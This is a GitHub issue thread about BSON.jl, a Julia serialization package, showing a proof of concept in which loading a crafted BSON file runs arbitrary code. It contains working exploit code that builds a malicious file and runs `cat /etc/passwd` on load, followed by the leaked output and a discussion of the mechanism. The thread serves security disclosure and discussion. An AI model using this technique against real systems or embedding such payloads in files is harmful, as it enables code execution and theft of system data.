Closed chethega closed 4 years ago
Without risking me compromising your machine:
julia> using BSON
julia> struct SubArray{T,N,P,I,L}<:AbstractArray{T,N}
parent
indices
offset1
stride1
end
julia> br=Base.Broadcast.Broadcasted(run, ([`cat /etc/passwd`],));
julia> v=SubArray{Any,1, Any,Tuple{Array{Int64,1}}, false}(br, ([1],), 0, 0);
julia> w=SubArray{Any,1, Any,Tuple{Array{Int64,1}}, false}(1:5, (v,), 0, 0);
julia> BSON.bson("poc.bson", a=w);
Then start a new julia session:
julia> using BSON
julia> BSON.load("poc.bson");
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/usr/bin/nologin
[...]
ERROR: MethodError: Cannot `convert` an object of type Base.Process to an object of type Int64
Just wondering: is this actually due to the BSON loading process, or due to the show
method invoked by the REPL?
I figured the BSON loading could probably be made secure (though obviously that's pretty moot for most users if any practical usage of that data is unsafe).
it is actually the loading. Note the ;
at the end.
We had some discussion on slack that loading of adversarial BSON files is insecure by design and intention. Hence, this is not really a security issue, and requires no responsible disclosure. However, I think we could document this better, and maybe keep this issue open as catch-all discussion thread for security aspects of
BSON.jl
.On slack, @oxinabox asked for a PoC. Find a PoC attached (expected behavior:
parse
should work without issue and allow you to inspect the file;load
runscat /etc/passwd
before erroring out; you might consider using a VM for that).Code execution is obtained by triggering a
convert
of aSubArray
, which in turn triggers agetindex
on aBase.Broadcast.Broadcasted(run, ([
cat /etc/passwd],))
.poc.bson.zip